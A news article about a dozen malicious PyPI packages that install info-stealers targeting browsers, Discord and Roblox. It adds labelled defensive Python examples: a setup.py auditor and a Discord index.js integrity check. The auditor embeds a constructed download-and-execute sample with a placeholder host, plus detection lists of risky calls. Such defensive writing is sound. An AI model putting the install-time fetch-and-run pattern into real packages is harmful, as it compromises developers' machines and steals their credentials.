Malicious PyPI packages turn Discord into password-stealing malware

A dozen malicious PyPI packages have been discovered installing malware that turns the Discord client into an information-stealing backdoor and steals data from web browsers and Roblox.

The twelve packages were uploaded to the Python Package Index (PyPI) on August 1, 2022, by a user named “scarycoder,” and discovered by researchers at Snyk.

Contrary to the common typo-squatting approach, these packages use their own names and promise various features to promote themselves to interested developers.

Malicious repository on PyPI

The Python packages pretend to be Roblox tools, thread management, and basic hacking modules, but none feature the promised functionality. Instead, the packages install password-stealing malware on developers’ devices.

Unfortunately, this set of malicious PyPI packages had not been removed from the open source package repository at the time of writing, so software developers are still at risk.

A dirty dozen

As part of a new report by Snyk, researchers analyze one of these malicious Python packages named “cyphers,” showing how malicious code hidden in the “setup.py” file is used to install two malware executables from a Discord CDN server, namely “ZYXMN.exe” and “ZYRBX.exe.”

The behavior is the same for all packages in the set, except for “hackerfilelol” and “hackerfileloll,” which use a single malicious executable named “Main.exe.”
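Because pip runs a source distribution's setup.py at install time, the file can be reviewed statically before anything executes. The following is an added example, not code from Snyk or from the packages: it parses a setup.py with `ast` and reports imports, calls and URL strings that have no place in a build script. The module and call lists are assumed heuristics, and the sample input, its `example.invalid` host and its file names are constructed placeholders.

```python
import ast
import re

# Heuristic lists are assumptions for this example, not Snyk's detection rules.
RISKY_MODULES = {"urllib", "requests", "subprocess", "socket", "ctypes", "base64"}
RISKY_CALLS = {"system", "popen", "Popen", "run", "call", "check_output",
               "startfile", "urlretrieve", "urlopen", "exec", "eval"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

# Constructed sample of the pattern the article describes; it is parsed, never run.
SUSPICIOUS = '''from setuptools import setup
import urllib.request, subprocess
URL = "https://cdn.example.invalid/attachments/0/0/PLACEHOLDER.exe"
urllib.request.urlretrieve(URL, "PLACEHOLDER.exe")
subprocess.Popen("PLACEHOLDER.exe")
setup(name="constructed-sample", version="0.0.1")
'''


def audit_setup_py(source: str) -> list:
    """Return findings for a setup.py without executing it."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name.split(".")[0] in RISKY_MODULES:
                findings.append(f"line {node.lineno}: imports {name}")
        if isinstance(node, ast.Call):
            func = node.func
            called = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if called in RISKY_CALLS:
                findings.append(f"line {node.lineno}: calls {called}()")
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                kind = "executable URL" if url.lower().endswith(".exe") else "URL"
                findings.append(f"line {node.lineno}: {kind} {url}")
    return findings


if __name__ == "__main__":
    for finding in audit_setup_py(SUSPICIOUS):
        print(finding)
```

A plain URL finding is common in legitimate packages (project homepages), so the signal worth escalating is a network or process call combined with an executable URL.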

The first binary, ZYXMN.exe, is used to steal information from Google Chrome, Chromium, Microsoft Edge, Firefox, and Opera, including stored passwords, browser history, cookies, and search history.

To steal information from browsers, the malware will decrypt the web browser’s local database master key to retrieve cleartext data of the victim’s search history, browsing history, cookies, bookmarks, stored passwords, and stored credit cards. This information is then uploaded to the threat actors via a Discord webhook.

More notably, the malware also modifies the JavaScript files used by the Discord client, injecting a backdoor that can steal information directly from the victim's Discord account.

To steal data from Discord, the malware modifies the index.js file under the ‘discord_desktop_core’ folder to add the malicious Discord-Injection script. The clients targeted for this injection are Discord, Discord Development, Discord Canary, and Discord PTB (Public Test Build).
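A defender can check for this kind of tampering by comparing each client's index.js with its stock content. This is an added example, not from the article or Snyk's report; it assumes that an unmodified discord_desktop_core/index.js only re-exports core.asar, that the four clients live in the folder names shown, and that they are installed under %LOCALAPPDATA% on Windows.

```python
import os
from pathlib import Path

# Assumption: a stock discord_desktop_core/index.js only re-exports core.asar.
EXPECTED = "module.exports = require('./core.asar');"
# Assumed install folder names for the four clients the article lists.
CLIENT_DIRS = ("Discord", "DiscordDevelopment", "DiscordCanary", "DiscordPTB")


def find_core_index_files(base: Path):
    """Yield every index.js that sits directly in a discord_desktop_core folder."""
    for client in CLIENT_DIRS:
        root = base / client
        if root.is_dir():
            for path in root.rglob("index.js"):
                if path.parent.name == "discord_desktop_core":
                    yield path


def check_discord_clients(base: Path) -> dict:
    """Map each index.js found to 'clean' or 'modified'."""
    expected = "".join(EXPECTED.split())
    results = {}
    for path in find_core_index_files(base):
        text = path.read_text(encoding="utf-8", errors="replace")
        # Ignore whitespace and quote-style differences before comparing.
        normalised = "".join(text.split()).replace('"', "'")
        results[str(path)] = "clean" if normalised == expected else "modified"
    return results


if __name__ == "__main__":
    base = Path(os.environ.get("LOCALAPPDATA", "."))
    for path, verdict in check_discord_clients(base).items():
        print(verdict, path)
```

A "clean" verdict covers only this one file; it says nothing about the browser-stealing executable described above.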

Discord injection to run within the app’s context (Snyk)

Once the script is injected and Discord is restarted, the client performs a variety of malicious actions, including stealing authentication tokens, Nitro status, billing information, and credit cards.

Discord-Injection project features (Source: BleepingComputer)

The second malware, ZYRBX.exe, focuses solely on Roblox, attempting to steal the account cookie, user ID, Robux balance, and Premium status from the online gaming platform and exfiltrate them to a Discord webhook.

ZYRBX’s Discord data-stealing code (Snyk)

More malware on PyPI

Yesterday, Kaspersky published a report presenting two other PyPI packages that contain info-stealing malware and also modify the Discord client.

The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.

After this step, the stealer scans the host’s Downloads, Documents, and Desktop folders to locate 2FA recovery lists, password text files, Discord tokens, PayPal account info, and more.

Scanned items on local folders (Kaspersky)

The malicious duo discovered by Kaspersky are “pyquest” and “ultrarequests,” mimicking projects with millions of downloads and even cloning their code.

Code comparison reveals obfuscated malware-fetching script on cloned project (Kaspersky)

PyPI’s response to malicious package reports appears to be slow, with malicious packages remaining online for days after being reported. This is likely the result of a small team of volunteers with a limited budget being overwhelmed by constant malware uploads.

Unfortunately, this gives more uptime to the malicious packages and increases the chances of software developers becoming victims of this malware.
